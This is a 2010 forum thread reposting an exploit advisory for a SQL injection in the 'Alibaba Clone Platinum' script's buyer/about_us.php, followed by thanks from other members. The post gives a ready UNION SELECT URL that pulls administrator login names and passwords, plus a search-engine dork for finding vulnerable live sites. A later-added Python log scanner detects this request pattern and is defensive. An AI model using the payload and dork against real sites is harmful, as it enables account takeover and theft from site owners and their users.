:: vBspiders Professional Network ::


Dr.NaNo 05-16-2010 02:27 AM

Alibaba Clone Platinum (about_us.php) SQL Injection Vulnerability
 
Quote:

# title: Alibaba clone platinum (about_us.php) sql injection vulnerability
# edb-id: 12612
# cve-id: ()
# osvdb-id: ()
# author: Cobra_21
# published: 2010-05-15
# verified: Yes
# download exploit code
# download n/a

-------------------------------------------------------------------------------------------

alibaba clone platinum (about_us.php) sql injection vulnerability

-------------------------------------------------------------------------------------------

author: Cobra_21

mail: uyku_cu@windowslive.com

script home: http://www.alibabaclone.com/

price: $699 usd

dork: Inurl:buyer/about_us.php?buyerid
-------------------------------------------------------------------------------------------

sql injection:

http://localhost/[path]/buyer/about_us.php?buyerid=-31%20union/**/select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,concat%28loginid,0x3a,password%29,38,39, 40%20from%20admin

-------------------------------------------------------------------------------------------






Exploitation:

Quote:

http://localhost/[path]/buyer/about_us.php?buyerid=-31%20union/**/select%200,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ,34,35,36,concat%28loginid,0x3a,password%29,38,39, 40%20from%20admin

The dork for finding affected sites in search engines such as Google:


Quote:

inurl:buyer/about_us.php?buyerid
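
A defender-side check for the request pattern quoted in the post above, as an added example that is not part of the original thread or the advisory: it scans web access log lines for `buyer/about_us.php` requests whose `buyerid` is not a plain integer, and normalises the `/**/` comment trick before looking for a UNION SELECT. The combined log format, the sample lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b")

def classify_buyerid(value):
    """Return 'ok', 'union-select' or 'non-numeric' for a decoded buyerid."""
    # Assumption: legitimate buyer ids are unsigned decimal integers.
    if re.fullmatch(r"[0-9]+", value):
        return "ok"
    # Inline comments such as /**/ stand in for whitespace; normalise them first.
    flat = " ".join(SQL_COMMENT.sub(" ", value).lower().split())
    return "union-select" if UNION_SELECT.search(flat) else "non-numeric"

def scan(lines):
    """Yield (client, verdict, decoded_value) for suspicious about_us.php hits."""
    for line in lines:
        m = REQUEST.search(line)
        if not m:
            continue
        url = urlsplit(m.group(1))
        if not url.path.endswith("/buyer/about_us.php"):
            continue
        # parse_qs percent-decodes, so %20 and %28 are compared in decoded form.
        for value in parse_qs(url.query, keep_blank_values=True).get("buyerid", []):
            verdict = classify_buyerid(value)
            if verdict != "ok":
                yield line.split()[0], verdict, value

# Constructed sample lines (documentation IP ranges), not taken from a real log.
SAMPLE_LOG = [
    '192.0.2.10 - - [16/May/2010:10:00:01 +0000] '
    '"GET /buyer/about_us.php?buyerid=31 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [16/May/2010:10:02:13 +0000] '
    '"GET /buyer/about_us.php?buyerid=-31%20UNION/**/SELECT%200,1,2 HTTP/1.1" 200 4980',
    '198.51.100.7 - - [16/May/2010:10:02:40 +0000] '
    '"GET /buyer/about_us.php?buyerid=31%27 HTTP/1.1" 500 312',
    '192.0.2.10 - - [16/May/2010:10:03:05 +0000] '
    '"GET /buyer/products.php?id=4 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for client, verdict, value in scan(SAMPLE_LOG):
        print(f"{client}\t{verdict}\t{value!r}")
```

The same integer-only rule, applied in the application before the value reaches the query (or a parameterised query in its place), is what removes the injection point that the log scan can only report.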


KaLa$nikoV 05-16-2010 06:31 PM

Your creativity and brilliance have reached the sky.


Thank you, dear friend.

Dr.NaNo 05-17-2010 05:47 PM

Thank you, brother Vulcano, for the wonderful reply... truly, thank you.


My regards to you, dear friend.

